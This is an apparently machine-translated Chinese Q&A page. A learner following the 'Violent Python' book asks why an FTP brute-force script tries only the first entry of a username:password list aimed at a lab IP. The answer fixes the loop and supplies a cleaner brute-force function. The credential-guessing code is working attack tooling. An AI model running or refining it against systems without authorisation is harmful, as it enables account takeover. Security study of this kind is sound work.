我正在关注Violent Python书中的代码。这就是我在这里测试FTP的蛮力:
import ftplib
def bruteLogin(hostname, passwdFile):
pF = open(passwdFile, 'r')
for line in pF.readlines():
userName = line.split(':')[0]
passWord = line.split(':')[1].strip('\r').strip('\n')
print("[+] Trying: "+userName+"/"+passWord)
try:
ftp = ftplib.FTP(hostname)
ftp.login(userName, passWord)
print('\n[*] ' + str(hostname) +\
' FTP Logon Succeeded: '+userName+"/"+passWord)
ftp.quit()
return (userName, passWord)
except Exception as e:
pass
print('\n[-] Could not brute force FTP credentials.')
return (None, None)
host = '192.168.95.179'
passwdFile = 'C:/Users/Andrew/Documents/Python Stuff/userpass.txt'
bruteLogin(host, passwdFile)
使用'userpass.txt'示例组成:
administrator:password
admin:12345
root:secret
guest:guest
root:root
运行时(顺便说一句,我使用的是Python 3.4)它应该返回一个结果:
[+] Trying: administrator/password
[+] Trying: admin/12345
[+] Trying: root/secret
[+] Trying: guest/guest
[*] 192.168.95.179 FTP Logon Succeeded: guest/guest
以上是成功登录的示例,当然。当实际运行它时,它返回“找不到暴力FTP凭证”,但似乎只尝试文本文件的第一行,而不是通过异常并尝试其他行,如本书所述。有任何想法吗?
答案 0 :(得分:0)
只有在循环完成后才应打印“找不到...”行。您当前的代码会在每次迭代时执行此操作,因此如果第一次尝试不成功,则会打印它。
此外,如果尽可能缩短try块并尽可能捕获异常,则更容易推理异常。这样可以减少处理异常的情况,并使所有其他无关异常爆炸并变得可见,从而帮助您在不希望引发异常的位置调试代码。您的代码可能如下所示:
def bruteLogin(hostname, passwdFile):
pF = open(passwdFile, 'r')
ftp = ftplib.FTP(hostname) # reuse the connection
for line in pF.readlines():
userName, passWord = line.split(':', 1) # split only once, the pw may contain a :
passWord = passWord.strip('\r\n') # strip any of the two characters
print("[+] Trying: {}/{}".format(userName, passWord))
try:
ftp.login(userName, passWord)
except ftplib.error_perm:
continue
else:
print('\n[*] {} FTP Logon Succeeded: {}/{}'.format(hostname, userName, passWord))
ftp.quit()
return userName, passWord
print('\n[-] Could not brute force FTP credentials.')
return None, None